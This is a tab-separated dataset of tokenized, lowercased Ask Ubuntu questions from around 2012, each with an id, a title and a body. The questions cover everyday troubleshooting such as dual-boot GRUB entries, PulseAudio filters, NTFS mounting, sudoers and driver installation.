194274	i installed ubuntu alongside windows but i ca n't see it in windows ' boot menu	i have a second machine where ubuntu 12.04 lts and debian squeeze are installed on the same hd and when i boot , i have this grub menu where i can choose which partition i will used . it works perfectly ! but in my windows environment that 's another story . now after making almost everything that i know , to make it work along windows 7 , there is no entry in the boot menu of windows ( i know , ubuntu use grub but anyway there is surely a way to fix it , access it ? ) . why there is no ubuntu entry ? why the installation gave me no error while i have this strange situation of having a `` ghost os '' called ubuntu installed somewhere in my second hd in a partition made especially for it and not being able to access it , starting it , having it working ? am i wrong ? if i am , what 's the problem ? if i 'm not , what 's the need of wubi ?
194281	apply ladspa filter to only one channel of multichannel output with alsa and pulseaudio	i want to apply a filter , specifically swh 's glame-bandpass-iir , to only one of several output channels . i 'm still stumped after looking at the examples listed below . i 'm quite sure that module-ladspa-sink and module-remap-sink are the solution to my needs . i can not , however , understand the docs on module-remap-sink . to keep things simple lets assume the goal is to have the front l/r soundcard jack output unfiltered audio while the rear l/r soundcard jack outputs filtered audio . sink_name : the name for the new virtual sink . master : the name of the sink of which channels you 're remapping . channels : channel count of the new sink . channel_map : list of the channels that this sink will accept . master_channel_map : the channels in the master sink , where the channels listed in channel_map will be relayed to . channel_map and master_channel_map must have equal number of channels listed , because the channels will be mapped based on their position in the list , i.e . the first channel in channel_map will be relayed to the first channel in master_channel_map and so on . remix : allow remixing of the mono or stereo streams to multiple channels ( default is yes ; set to `` no '' if you do n't want the stereo stream to be up-mixed to all channels except subwoofer and channels named aux0-aux15 ) . http : //www.freedesktop.org/wiki/software/pulseaudio/documentation/user/modules # module-remap-sink the following is the filter sink that i want to use : # # # ladspa sink .ifexists module-ladspa-sink.so .nofail load-module module-ladspa-sink sink_name=ladspa_out master=alsa_out plugin=bandpass_iir_1892 label=bandpass_iir control=660.0,440.0,2 .fail .endif could someone kindly explain how i accomplish source - > ladspa_out - > center jack on soundcard . specifically , how do i fill this in ? load-module module-remap-sink filt_sink < ? > 2 < ? left , ? right > < ? m_left , ? m_right > < ? yes > in case it is relevant , i 'm using i945 onboard sound : alsa.long_card_name = `` intel ich7 with alc850 at irq 17 '' edited after weeks of frustration ... i 've tried just about every configuration of both /etc/pulse/default.pa and ~/pulse/default.pa that i can imagine without success . i have tried using various permutations of module-udev-detect|module-alsa-sink to setup alsa with 4 or 6 channels named front-left , front-right , left , right , aux0-4 , rear-left , rear-right and module-remap-sink and module-combine-sink as well as the intended module-ladspa-sink . though the filter will work on one , two or four channels , it has been impossible to simultaneously get unfiltered output through any other channels . i 've asked on # pulseaudio on irc and been told that what i want is impossible with pulse alone . i 'd really appreciate it if someone could point me to either a specific pulseaudio solution or a solution with other tools . thanks .
194284	do i need to format my drive before installing ?	i have two hard drives . one is for windows and the files i have accumulated over time . the other hard drive is an empty hard drive that i want to use to install and use ubuntu on . i have the ubuntu 12.04 iso disc and i booted with that disc . should i convert the empty hard drive 's file system to ext4 ? if so , how do i do that ? would choosing `` erase and use the entire disc '' convert the filesystem to ext4 automatically ?
194287	internal microphone does n't work on an acer aspire 1410	ubuntu 12.04 32bit acer aspire 1410 the built in microphone will not pic up sound . i have tried adjusting in pavucontrol , alsa mixer , and alsa-base.conf with various options : options snd-hda-intel model= < -- `` laptop '' `` acer '' etc . but ... no luck ! the computer was previously running netbook remix . we were able to get the mic to work at that time by panning the audio to one channel as a workaround .
194288	how can i backup files on /etc using deja dup ?	i am using ubuntu 12.04 lts . i 'm trying to setup deja dup to backup the files for several users ( /home ) and /etc but as it runs as myself , there are many files it can not read and therefore can not backup . i want to try running deja dup as root as then it should be able to read and backup all files . i 've seen some other info about how to set up a particular app to run as root , so i guess i should try that .
194291	how to take screenshot in a tty terminal	i sometimes go to tty1 to do some fixing when an app freezes or the system is slow ( rare cases ) but in some cases i need to take a screenshot of the tty terminal . is there an app , command or shortcut that can help me take a screenshot of the tty terminal ?
194293	how to send terminal command to a tty terminal	i am looking for a way to send an executed command to a tty terminal . for example , let us say that i open the gnome-terminal and on the window i type sudo aptitude update & & sudo aptitude upgrade . how can i send this to a tty terminal instead of working with it in the tty7 gui environment ?
194296	where to build wxpython ?	i 've downloaded wxpython-src-2.9.4.0.tar.bz2 from http : //www.wxpython.org ; right now i 'm trying to follow the build instructions on http : //www.wxpython.org/build.html . i 've managed to build it using $ python build-wxpython.py -- install without errors so far . the problem is i ca n't run it : import wx will return importerror : no module named wx , everytime.. my system has multiple pythons using virtualenvs . after running the build these files can be found together with other packages which i use on a usual basis ( in my site-packages folder ) : wx.pth wxpython_common-2.9.4.0-py2.7.egg-info wxpython_common-2.9.4.1-py2.7.egg-info i suspect that i 've installed it in the wrong location somehow , and i need to specify the location before building it . but i do n't know how . this is the build options : usage : build-wxpython.py [ options ] options : -- version show program 's version number and exit -h , -- help show this help message and exit -- build_dir=build_dir directory to store wx build files . ( not used on windows ) -- clean clean files from build directories . default is all build files . specify 'wx ' to clean just the wx build , 'py ' for just the wxpython build , and 'pyext ' for just the built extension modules . -- debug build wxpython with debug symbols -- extra_make=extra_make extra args to pass on [ n ] make 's command line . -- extra_setup=extra_setup extra args to pass on setup.py 's command line . -- force_config run configure when building even if the script determines it 's not necessary . -- install install the built wxpython into installdir or standard location -- installdir=installdir directory to install wxwidgets to . -- mac_framework build wxwidgets as a mac framework . -- mac_lipo experimental : create a universal binary by merging a ppc and intel build together . -- no_config turn off configure step on autoconf builds -- osx_cocoa build the os x cocoa port on mac ( experimental ) -- prefix=prefix prefix value to pass to the wx build . -- reswig allow swig to regenerate the wrappers -- unicode build wxpython with unicode support ( always on for wx2.9 ) -- wxpy_installdir=wxpy_installdir directory to install the wxpython binaries . can someone explain to me : what 's the difference between -- build_dir=build_dir , -- installdir=installdir and -- wxpy_installdir=wxpy_installdir ? which other parameters should i include to $ python build-wxpython.py -- install ?
194297	fresh install 12.04 performance & stability : sony vpccw2s1e	just yesterday i installed 12.04 - 64bit . is it normal that installing a package ( chrome for example ) takes 5 to 10 minutes ( compared to windows 7 for example which takes 2 or 3 ) ? ( with end result : installation failed ) otherwise is it normal that while the system is doing some installation , extracting packs and so on , other applications often become unresponsive ? sidenote : i do n't care about fancy desktop effects , i installed ubuntu to go on and experiment with web servers , memcache , varnish and git/svn . so basically i plan to do lots of console-only operations . my surprise was also the difference of stability compared to an old freebsd installation i had on a dinosaur p3 550mhz : ) ( i am on a sony vpccw2s1e ) ( i guess it might have to do something with my problems ? ) i noticed when doing 'top ' that the process that is taking most of the cpu time , and that is pumping up randomly , is mount.ntfs .
194298	ca n't start x session after updating packages	i have recently upgraded to 12.04 and all seems okay except adobe flash plugin does n't work . but several days ago when i installed several update packages and rebooted , x session was unable to start and it automatically switches to console 1 for command line login . what 's frustrating is there 's essentially no error messages when i click alt+f7 to see what 's going on with x session . there are a bunch of [ ok ] 's and the last line seems to be something like starting x font server and it just hang there . the closest thing to an error is something like stopping system v compatability ( \*words i ca n't remember\* ) ... [ ok ] ' . this is nearly the most frustrating experience i 've ever had with linux in the past 10 years . can anyone help me ?
194300	booting windows vm in server asks for os cd	using kvm i have installed windows virtual machine in ubuntu server 11.04 . every time if i boot the windows vm , it asks for os cd . but other linux vms boot properly . i need windows vm to be booted properly like other linux vms . can any one help ?
194303	get the path of moved directory/file ( source path and destination path )	when one directory is moved to other destination path , then i want to log the entry of original source path and entry of the path where it moved . any command is already available ? or any other way of doing this task ? ex : d1 = /home/user/documents/test d2 = /home/user/documents/data/test when i moved d1 directory to the destination path to d2 directory then i want to log , like '' test '' directory is moved from d1 to d2 path thanks
194305	what is the alternative for the following programs ?	what alternatives are there for the following programs ? internet download manager yahoo messenger visual basic what software do i need after installing ubuntu ?
194307	copy-paste not working	using precise pangolin . i am trying to copy some folders from my portable hard drive to one of the partitions . the paste button is not working in the destination folder and whenever i am trying a drag-drop with my mouse , it says that i do n't have permission to create there , albeit i have the root . even the new folder button is not working . help please . dialogue box and permission details attached .
194318	how does the sudoers work ?	during an installation , as usual , we create our main user account , and then we can do sudo commands with it without problem . now , when i created another account , and i wanted to do sudo , it gave me error that the account is not in the sudoers file . in that file i found out that users in % admin and % sudo groups can gain root privileges . but my main account is not in neither one of those groups and i can do sudo with it without problem , but with the other account i ca n't . is there something besides sudoers that i should know about ? thanks
194334	how can i check disk usage using ssh ?	we have an ssh server on ubuntu and we want a disk usage report using ssh of whole network.is there any utility , command , or script available to accomplish this ?
194338	is ubuntu elder-friendly ?	my parents hdd in their laptop broke so i decided to change it . the laptop wo n't somehow install the original os even though i have the disk . so i want to know if ubuntu is elder-friendly since it is my parents that will use the laptop most . ps . my parents are quicklearners : ) thanks .
194352	install openoffice for headless use	the question very simple and short . i am following this article to install openoffice headless : sudo apt-get install openoffice.org-headless openoffice.org-writer openoffice.org-draw and i get the following error : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package openoffice.org-headless e : could n't find any package by regex 'openoffice.org-headless' update : apt-cache search openoffice.org output : http : //pastebin.ubuntu.com/1262902/
194354	i ca n't interact with files and applications after first login	every time i restart my computer and login into my ubuntu account for the first time , i ca n't click on anything besides the bar on the left . i can start firefox from there , but i am not able to click on the new tab button etc . same will all other apps . i can start the terminal via the keyboard , but i ca n't move it around . i have to logout via the keyboard and login again . usually everything works fine now . just waiting does n't help . the only obvious change i made to ubuntu was to move the /home directory .
194355	samba configuration problem	i want to access samba from windows 7 and if i copy any data from server to win7 machine it automatic replicate ( take the backup ) the data to another machine . please suggest me how can i do it . thankyou
194356	i cant find grub page in my laptop	i had two operating system in my laptop.ubuntu 12.04 and windows 7. last day i reinstalled my windows 7 in same partition c. also i config a prtition for ubuntu with swap & / & /boot area . after reinstalling windows 7 os i cant see ubuntu grub for startup this os and i go directly to windows 7 . how i can install grub for going to ubuntu ? ? ? ? ? ? ? help me please ... thanks a lot .
194357	bought computer with ubuntu program messed up	i recently got a dell inspiron b130 with an ubuntu prgm on it and the main users desktop is scattered allover the place , files everywhere but not in folders , how do i fix this ? i am new working with this operating system , used to windows versions . if i go into a guest profile the desktop is perfectly fine and everything works but i can not make the system fix itself or do n't really know where to start help ? ? ? ? ? ? ? i have the user name and password and can get to terminal screen , but not sure how to remove and add myself to admin use
194361	how to stop fan running always on asus p8p67le motherboard with ati radeon hd6900	i 'm using ubuntu 12.04 lts . i 'm not sure if it is the cpu ( i7 ) fan or the video card fan . i 've tried using lm-sensors & fancontrol sudo sensors-detect now follows a summary of the probes i have just done . just press enter to continue : driver `w83627ehf ' : * isa bus , address 0x290 chip `nuvoton nct6776f super io sensors ' ( confidence : 9 ) driver `coretemp ' : * chip `intel digital thermal sensor ' ( confidence : 9 ) to load everything that is needed , add this to /etc/modules : # chip drivers coretemp w83627ehf like many people , i 'm also getting error : /usr/sbin/pwmconfig : there are no pwm-capable sensor modules installed here is the output of sensors : # sensors radeon-pci-0100 adapter : pci adapter temp1 : +71.0°c coretemp-isa-0000 adapter : isa adapter physical id 0 : +44.0°c ( high = +80.0°c , crit = +98.0°c ) core 0 : +44.0°c ( high = +80.0°c , crit = +98.0°c ) core 1 : +40.0°c ( high = +80.0°c , crit = +98.0°c ) core 2 : +43.0°c ( high = +80.0°c , crit = +98.0°c ) core 3 : +42.0°c ( high = +80.0°c , crit = +98.0°c ) i 'm hoping some-one has already solved this for my configuration because this seems to be a problem for many people and there are many different suggestions .
194364	window buttons stuck on right side	after i upgraded to quantal the window buttons of not maximized windows mysteriously moved to the right having the order they have in the panel when maximized . and i ca n't put them back to the left which is really annoying . i guess something was messed up during the upgrade . i tried ubuntu tweak and gconf-editor so far but changing the button layout there does n't do anything . any suggestions ?
194368	how to convert video to mp3 in ubuntu 12.04 ?	i am using 12.04 . i have found a question that have the solution how to convert a video to mp3 ? but when i tried the answer i got this problem . subbu @ subbu-300e4z-300e5z-300e7z : ~ $ sudo apt-get install ffmpeg libavcodec-unstripped-52 . reading package lists ... done building dependency tree reading state information ... done e : unable to locate package libavcodec-unstripped-52 . e : could n't find any package by regex 'libavcodec-unstripped-52 . '
194373	alternative to tag & rename	when i was using windows , i used to use tag and rename software for tagging mp3 files , which was really useful and convenient . do you have some recommendation to a software which is kind of similar to that ?
194376	network manager internet sharing and dnsmasq conflict	i am sharing internet from eth1 to eth2 . i do this by editing the eth2 properties and setting method to shared to other computers . i also use dnsmasq for dns caching . now if i enable internet sharing i have to stop the existing dnsmasq instance as network manager starts its own dnsmasq instance . but this new dnsmasq instance has no dns caching options . now my dns query is taking more time . how can i change the dnsmasq or network manager so when network manager starts the dnsmasq it also support dns caching ? some faq . `` taking more time '' , how much more ? using dns caching it take 0ms . without 100ms . how did you measure this time using dig command
194378	how do i install and use voice commands ?	how can i give my own command using mic . i would like to give command like : '' update system now '' so system will automatic run apt-get update i 've seen gnome voice control but i get error : $ @ penreturns 06:34 pm ~ > sudo apt-get install gnome-voice-control [ sudo ] password for r00t : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package gnome-voice-control my details : $ @ penreturns 06:56 pm ~ uname -a ; cat /etc/lsb-release ; gnome-shell -- version linux penreturns 3.4.1-030401-generic # 201206041411 smp mon jun 4 18:12:24 utc 2012 x86_64 x86_64 x86_64 gnu/linux distrib_id=ubuntu distrib_release=12.04 distrib_codename=precise distrib_description= '' ubuntu 12.04.1 lts '' gnome shell 3.5.4 $ @ penreturns 06:56 pm ~ how do i start this project . what package do i need . what script do i need to learn .
194382	how to find out who is using the physical console ?	i would like to use a script to find out the username - of the user who is currently on the physical console ( who has command of the keyboard , mouse and graphical display ) ? i do not just want to know who runs x ( as the current console can be switched to another terminal and another user ) . to clarify : commands like w , who etc . show who is logged at which terminal . this is simple . i would like to know , however , who owns currently the physical console ( display , keyboard etc. ) . for example , if two users run displays :0 and :1 , and i can switch between the displays with ctrl+alt+7 and ctrl+alt+8 , i would like to know which user currently has the connection between his or her display and the actual , physical screen . one more clarification : i am not interested in knowing my own username . i have a script , running as another user or root , that needs to know who uses the physical display . there can be several x sessions running by different users , some of them virtualized , some of them connected to a remote x server , but i am only interested in the one that is actually displaying output on the monitor . yet another clarification : whatever the command is , the output must be different after pressing ctrl+alt+f1 ( switching to another virtual console ) .
194385	automount of external hard disk	i have an intenso 6002560 1tb memory station - an external hard disk . this hard disk gets connected via y-usb cable . when i connect both usb-ends to my notebook , it gets recognized by my ubuntu 10.04.4 lts system : moose @ pc07 : ~ $ lsusb [ ... ] bus 002 device 005 : id 13fd:1840 initio corporation [ ... ] and disk /dev/sda : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00065e10 device boot start end blocks id system /dev/sda1 * 1 37810 303704064 83 linux /dev/sda2 37810 38914 8864769 5 extended /dev/sda5 37810 38914 8864768 82 linux swap / solaris disk /dev/sdc : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0d6ea32a device boot start end blocks id system /dev/sdc1 1 121601 976759008+ c w95 fat32 ( lba ) but it did not get mounted : moose @ pc07 : /dev $ mount -l /dev/sda1 on / type ext4 ( rw , errors=remount-ro , user_xattr ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) none on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) none on /dev type devtmpfs ( rw , mode=0755 ) none on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) none on /dev/shm type tmpfs ( rw , nosuid , nodev ) none on /var/run type tmpfs ( rw , nosuid , mode=0755 ) none on /var/lock type tmpfs ( rw , noexec , nosuid , nodev ) none on /lib/init/rw type tmpfs ( rw , nosuid , mode=0755 ) binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc ( rw , noexec , nosuid , nodev ) gvfs-fuse-daemon on /home/moose/.gvfs type fuse.gvfs-fuse-daemon ( rw , nosuid , nodev , user=moose ) however , i could mount it manually with mount -t vfat /dev/sdc1 /mnt/sdc1 as you can see here : moose @ pc07 : ~ $ mount -l /dev/sda1 on / type ext4 ( rw , errors=remount-ro , user_xattr ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) none on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) none on /dev type devtmpfs ( rw , mode=0755 ) none on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) none on /dev/shm type tmpfs ( rw , nosuid , nodev ) none on /var/run type tmpfs ( rw , nosuid , mode=0755 ) none on /var/lock type tmpfs ( rw , noexec , nosuid , nodev ) none on /lib/init/rw type tmpfs ( rw , nosuid , mode=0755 ) binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc ( rw , noexec , nosuid , nodev ) gvfs-fuse-daemon on /home/moose/.gvfs type fuse.gvfs-fuse-daemon ( rw , nosuid , nodev , user=moose ) /dev/sdc1 on /mnt/sdc1 type vfat ( rw ) edit : another command : moose @ pc07 : ~ $ sudo blkid -o list device fs_type label mount point uuid -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- /dev/sda1 ext4 / 45eb611b-517e-425b-8057-0391726cccd5 /dev/sda5 swap < swap > e9dc42f3-594c-4b62-874a-305eda5eed41 moose @ pc07 : ~ $ blkid -o list device fs_type label mount point uuid -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- /dev/sda1 ext4 / 45eb611b-517e-425b-8057-0391726cccd5 /dev/sda5 swap < swap > e9dc42f3-594c-4b62-874a-305eda5eed41 /dev/sdc1 /mnt/sdc1 edit : another command : moose @ pc07 : ~ $ ls -l /dev/disk/by-uuid/ total 0 lrwxrwxrwx 1 root root 10 2012-09-30 09:31 45eb611b-517e-425b-8057-0391726cccd5 - > ../../sda1 lrwxrwxrwx 1 root root 10 2012-09-30 09:31 e9dc42f3-594c-4b62-874a-305eda5eed41 - > ../../sda5 here is a link to a launchpad question about this problem . but i would like it to mount automatically . what do i have to do ?
194388	how do i achieve a pppoe connection over wifi ?	i am trying to move my pppoe dialling from my router to two machines on that router , a windows 7 and an ubuntu 12.04 machine . ( actually one machine with dual boot for now ) . i set up a dsl ( pppoe ) connection using the edit connections dialogue , and while i am connected to the router via cable , the dsl connection is available and works , but as soon as i disconnect the cable , and connect to the wlan ( the wifi ap is part of the router ) , the dsl connection is no longer visible . i need to dial the pppoe using the wifi to connect my pc to the router . how should i do this ? my router is a a billion 400g , set to full bridge . my windows pppoe connection works fine , cable or wifi , so the device is capable . this video - suggests i need to use pppoeconf to create the dsl connection while connected over wifi . i 'll try that asap .
194389	how do i install oracle java on 12.04 such that it works in google chrome/chromium ?	i 've looked at the other questions asked on this subject and i got openjdk and its plugin for web browsers but it is n't working for me . please help me here , would be much appreciated if someone could give me a series of commands to write into terminal to install it .
194390	settings for multiple monitors are not stored	i am running ubuntu 12.04. on a lenovo thinkpad t400 . i connected an external monitor as a second display . the laptop stands under the external screen . the laptop has a native resolution of 1440x900 ( 16:10 ) , the external monitor 1280x1024 ( 5:4 ) . there are two graphic adapters : one internal intel gma 4500 mhd and an discrete ati card . currently , the integrated intel is enabled . i use the displays application to arrange the position of the monitors so it look like this : the problem : whenever i restart my computer the configuration gets lost . first , the displays are mirrored instead of extended . i have to press fn + f7 two times to switch to extended mode . second , the displays settings still look like this : i know this worked once when i was running ubuntu 10.10 . i can not tell since when it does not work . do you know how i can permanently store the settings ? sometimes when i start ubuntu and press fn + f7 nothing happens . when i open displays i and position the external screen above and press the `` apply '' button nothing happens . then , after a minute or so the settings apply suddenly . do you know if there is a log file which could help to analyse the behavior ?
194395	cant boot after update	after update ( 28. september ) my pc freezes and than restart after few secs . i have installed ubuntu 12.04 x64 . i tried to boot into failsafe mod , but same thing happens . i can access terminal . here is error log . x.org x server 1.11.3 , release date 2011-12-16 [ 30.875 ] ( ii ) loading /usr/lib/xorg/modules/drivers/vesa_drv.sp [ 30.875 ] vesa : ignoring device with a bound kernel driver [ 30.875 ] ( ww ) falling back to old probe method for vesa [ 30.875 ] ( ii ) unloadmodule : `` vesa '' [ 30.875 ] ( ii ) unloading vesa [ 30.875 ] ( ee ) screen ( s ) found , but none have a usable configuration . [ 30.875 ] fatal server error : [ 30.875 ] no screens found [ 30.875 ] please consult the x.org support at wiki.x.org [ 30.875 ] please also check the log file at `` /var/log/xorg.failsafe.log '' for additional information . [ 30.875 ] [ 30.877 ] ddxsiggiveup : closing log [ 30.877 ] server terminated with error ( 1 ) . closing log file i cant post whole file , its too long ... there is no any errors before those lines . i think its problem with drivers , but i dont know how to fix it . please help ! amd phenom x4 840 6gb ddr3 radeon hd 5570 , official amd drivers
194399	damaged external ntfs hard disk	a few days ago , i used my external hard disk ( a 2tb seagate ) in order to transfer some files on windows vista . during that , i noticed some malfunctions on my system ( it was running too slow , windows explorer crashed ) . when explorer crashed , file transportation stopped . i was afraid , but i tried to access my files and it seemed to be working . i tried to open a movie ( from the external disk ) but it could n't load . i thought of restarting , but this took sooo long ... so i unplugged the hard disk and at that time it managed to shut down . i logged on to windows vista but the hard disk could n't be mounted . i plugged it but nothing happened . i unplugged it and i heard this specific sound that notifies that something has been unplugged . i thought of logging to ubuntu 10.04 and see what i can do . i plugged the hard disk , but i could n't see it . i opened gparted but i could n't see it either . i tried with disc utility and there it was ! i tried to mount it but a got an error message stating that an error occured with windows , there is a file ( 0,0 ) that has problem or something like that . it suggested to log into windows and run chkdsk /f and reboot twice . the thing is that i am somehow afraid to do so because i do n't really know the impact on that . plus i do n't trust doing even a check on vista ... i finally risked it and i typed chkdsk/f on a cmd . i can not , however , actually run it because i do n't have admin privileges . so from search i found chkdsk , i right cliked and selected ârun as administratorâ . it run but i got a message like ntfs file system . it should check at the coming restart . at that point i am mistaken . i thought that f meant f but this is not the case here ... does anyone have any suggestions and advice ? i 've tried with partition magic bootable cd but i could n't get my hdd mounted . at first i thought of running a disk health . my device was named `` unknown '' and i got the message /dev/sdb failed : no such device then i tried with gparted but it could n't find my hdd . finally i tried to mount it from a `` mount utility '' or sth like that but it could n't be mounted . the first time i tried i got an error run : mount /dev/sdb status : finished with error ( exit status 1 ) udevil : error 64 : unable to determine device fstype specify with -t after that there was a list of all my drives . when i selected the external one i got the error message run : mount /dev/sdb1 status : finished with error ( exit status 18 ) failed to write lock '/dev/sdb1 ' : resource temporalily unavailable error opening '/dev/sdb1 ' : resource temporalily unavailable failed to mount : resource temporalily unavailable the second time i tried to mount it i got a new error message run : mount /dev/sdb status : finished with error ( exit status 1 ) udevil : error 57 : can not stat /dev/sdb : no such file or directory any ideas on what 's going on ?
194401	ca n't install alternate cd from usb ?	i 'm trying to install ubuntu 12.04 with full hard disk encryption . after downloading and installing the ubuntu live cd , i learned that truecrypt does n't support full disk encryption on linux . i also learned that the best way to get `` nearly full disk encryption '' on ubuntu is by installing it from the alternate install cd . i tried that , but something is wrong with my cd reader/burner so it doesnt boot up when i insert the cd . my thought here was to take the .iso that i downloaded on my unencrypted ubuntu system , use unetbootin to make the usb drive . the usb drive used for this is exactly the same brand as one that i know has worked with a previous ubuntu live system on the same computer . i also used unetbootin for that usb , but i created it from windows that time . the usb stick boots up fine and i get through the first couple of steps in the installation process . however , after a while i get a `` box '' with the following error message '' load installer components from cd '' there was a problem reading data from the cd-rom . please make sure it is in the drive . if retrying does not work , you should check the integrity of your cd-rom . `` failed to copy file from cd-rom . retry ? '' then i ca n't get any further . i googled a lot and found this page which seems to tackle this very problem : i tried to do what it said . after pressing tab , i wrote : cdrom-detect/try-usb=true without quotes because that 's what i think is right . when i press tab , there already is a text saying : /ubnkern initrd=/ubninit vga=788 -- quiet which can be removed . i have tried to both delete the text before the -- and just inserting cdrom-detect/try-usb=true before it . any idea of what can be wrong ? i would like to do a full system encryption , or as full as it is possible . i do n't want to just encrypt my /home folder . maybe this is n't the easiest way . i use sandisk usb sticks . i know there is a problem with u3 launcher on some sandisks , but i never had to remove u3 before from similar disks , and the alternate install does boot up , so i dont think using u3 removal would help me . any help or indication to an easier way to do this would be appreciated .
194406	how to find what program woke the computer up ?	something is waking my computer automatically from hibernate every morning . how can i find what program that is ? alternatively , how can i disable/prohibit all such wakeups ? ( i presume it 's through rtcwake or a similar mechanism . )
194408	how can i find the binary that is executed when entering a command ?	i just have installed tex-live 2012 , but i still get moose @ pc07 : ~ $ latex -- version pdftex 3.1415926-1.40.10-2.2 ( tex live 2009/debian ) kpathsea version 5.0.0 copyright 2009 peter breitenlohner ( etex ) /han the thanh ( pdftex ) . there is no warranty . redistribution of this software is covered by the terms of both the pdftex copyright and the lesser gnu general public license . for more information about these matters , see the file named copying and the pdftex source . primary author of pdftex : peter breitenlohner ( etex ) /han the thanh ( pdftex ) . compiled with libpng 1.2.42 ; using libpng 1.2.42 compiled with zlib 1.2.3.3 ; using zlib 1.2.3.3 compiled with poppler version 0.12.4 so i 've wondered if i could find out where the binary that gets executed when i enter latex -- version is located . is this possible ?
194412	how to bond wireless networks ?	does anyone know how to bond wireless networks ? if so , please write a step by step howto . i am new in linux and i do n't know anything .
194414	mount.ntfs taking all the cpu ( wubi )	i installed yesterday ubuntu following the 'click and play ' instructions of the ( nicely done ) ubuntu website . i used wubi . its installed in a partition of a drive that mainly has a windows 7 install . after several problems i realized mount.ntfs was often taking above 90 % of the cpu which caused the system to hang / become unresponsive etc . i did some research and i saw that the ntfs-3g driver has some bugs . i also read that wubi was not a good medium to install ubuntu . my questions are : 1 ) if wubi is not reliable why is it promoted so heavily on the website ? 2 ) would installing another distribution or even freebsd work better ? 3 ) would installing ubuntu on an external drive of the file system type that linux works with solve the problem ?
194420	youtube-dl is not working	i am using youtube-dl to download some videos from youtube . but when i write : youtube-dl http : //www.youtube.com/watch ? v=rn_yodijo6k i get : [ youtube ] setting language [ youtube ] rn_yodijo6k : downloading video webpage [ youtube ] rn_yodijo6k : downloading video info webpage [ youtube ] rn_yodijo6k : extracting video information error : unable to download video what am i doing wrong ?
194424	canon ip4200 driver not working	any ideas how to setup a ip4200with ubuntu 12.04 64bit ? as far as i know , there is no official driver by canon . http : //ppa.launchpad.net/michael-gruz/canon/ubuntu oneiric is not working hope somebody can help me , thanks .
194425	how to change wingpanel background color	i am using elementray os luna daily build . and it works fine ! but if i switch the gtk theme to zukitwo the color of the wingpanel is not so pleasant . and i try to change color in /usr/share/wingpanel/style/default.css but no lucky how can i make the wingpanel background color
194427	what is the terminal command to take a screenshot ?	what command ( s ) can i use in the terminal that 's equivalent to the prtsc ( print screen ) button ? i am running ubuntu gnome .
194428	how do i access a background terminal program started in startup on gnome ?	i installed a terminal server program for my grandson so that when he logs on to gnome it automatically starts but he needs to access it to edit commands ocasionaly or to shut it down but i ca n't find access to the terminal running anywhere . i see it running in system monitor but ca n't bring it forward . it 's a startup program .sh file .
194429	can a broken power supply freeze ubuntu ?	several months ago my ubuntu 10.04 started to freeze some minutes after booting . i did n't reboot , just get stuck ( mouse , keyboard , etc . ) one day it did n't boot at all - ut was dead . i tested the power supply and it was broken , so i changed it ( for a more powerful one ) and both problems are gone . since 3 weeks , the pc is working fine . it did n't freezes anymore . can the power supply affect the os in this way ? may it because of a leak of current ?
194436	ca n't get 12.04 64bit stick to boot	i 'm an experienced linux user , but now i 've got a problem . for usual i install my os via usb sticks , like that i 've handled it with 10.04 , 10.10 , 11.04 , 11.10 and 12.04 ( 32 bit ) , and it always worked fine for me . but after creating a stick with the 64-bit version of precise , it wo n't appear in the bios or the alternative boot-manager the mainboard provides . i currently do n't have an optical drive , so a cd/dvd is no alternative . what could be the problem , what could i do ? hardware info : cpu : amd phenom ( tm ) ii x4 980 mb : ga-990fxa-ud5 ram : 16 gb gra : radeon hd6870 2gb
194437	how can i create a .deb file that adds a repository to sources.list.d ?	i want to start sharing .deb files that automatically add new repos to an ubuntu installation ( like the ones present in puppetlabs.com ) . how can i do that ?
194441	how to install gt630m driver on ubuntu 12.04 ?	i use ubuntu 12.04 64 bits . i try to install nvidia-linux-x86_64-302.07.run and nvidia-linux-x86_64-304.51.run . but it does n't work . those driver even lower my resolution . where is the correct driver and how to install it ? thank you~
194442	how do i mount my ntfs hard drive partition ?	my computer 's internal hard drive has an intermediate partition called 'storage ' which can be accessed from either windows or ubuntu . it is an ntfs partition but when i try to mount it in ubuntu as root using : sudo /usr/bin/udisks -- mount /dev/sda3 i get the error message mount failed : error mounting : mount exited with exit code 1 : helper failed with : mount : unknown filesystem type 'ntfs-3g' please note that i only have a very basic understanding of ubuntu so if anyone could give me step by step instructions to fix this it would be very much appreciated ! thanks .
194445	how can i downgrade ubuntu ?	i have recently updated my ubuntu install from 10.04 to 12.04 , however 10.04 is much faster how can i retrieve 10.04 without losing all my data ie : bookmarks and emails and downloads . help would be much appreciated .
194450	how to add another panel ?	i want to add a new panel other than the top one . is that possible ? if yes , how ?
